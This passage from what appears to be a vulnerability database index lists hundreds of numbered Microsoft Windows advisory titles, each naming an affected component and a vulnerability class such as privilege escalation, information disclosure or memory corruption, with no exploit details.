privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt 